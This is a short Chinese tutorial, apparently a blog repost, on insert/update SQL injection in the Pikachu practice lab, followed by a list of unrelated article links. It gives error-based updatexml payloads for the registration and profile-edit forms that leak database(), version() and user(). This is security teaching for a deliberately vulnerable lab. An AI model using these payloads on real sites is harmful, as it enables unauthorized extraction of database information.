insert/update注入
本文共 701 字,大约阅读时间需要 2 分钟。
insert/update注入
实验环境:
皮卡丘靶场—insert/update注入原理:
-
insert注入(注册新用户):
后端没有做防SQL注入处理,在前端注册的信息,通过insert直接拼接到数据库中; insert into member(username, pw, sex, phonenum, email, address) value (‘xiaohong’, 1111, 1, 2, 3, 4)
insert语句一般通过or进行闭合: insert into member(username, pw, sex, phonenum, email, address) value (‘1’ or updatexml(1, concat(0x7e, database()),0) or '’, 1111, 1, 2, 3, 4) 
-
update注入(用户更新信息)
实验步骤:
-
insert注入(用户注册):
(1). 注册信息,在用户栏输入危险字符’,并查看报错信息:
(2). 设计payload,并输入到存在SQL注入的地方: aaaa’ or updatexml(1, concat(0x7e, database()),0) or ’ 
同理可以将database()替换成version(), user()和select查询语句(与上一节课一样); -
update注入(修改信息):
(1)输入用户名密码登录lucy/123456,在点击修改个人信息: (2)写入payload:aaa’ or updatexml(1, concat(0x7e, database()),0) or’
转载地址:http://osfmf.baihongyu.com/
你可能感兴趣的文章
Linux Python 2.7.15
查看>>
Nexus配置Linux Yum Repository
查看>>
Nexus Python pip Repository
查看>>
Linux Mysql 8.0.1
查看>>
Python pymqi 连接 IBM MQ
查看>>
JVM性能调优监控工具jps、jstack、jmap、jhat、jstat、hprof 详解
查看>>
Java - JVM TLAB、对象在内存中安置顺序、垃圾收集、回收算法
查看>>
转: 关于Linux与JVM的内存关系分析
查看>>
(转)Java 程序员必备的高效 Intellij IDEA 插件
查看>>
局域网(内网)docker安装及代理访问
查看>>
软考 英语学习
查看>>
maven 文件上传到远程服务器目录
查看>>
shell 脚本免密远程访问
查看>>
Linux平台Oracle多个实例启动说明
查看>>
在LINUX平台上手动创建数据库(oracle 10g)(在一个oracle服务器上启动两个实例)
查看>>
Oracle 10g 下载地址
查看>>
Linux 下 新增Oracle10g 实例
查看>>
LRM-00123 ORA-01078
查看>>
ORA-01102: cannot mount database in EXCLUSIVE mode
查看>>
专栏结语
查看>>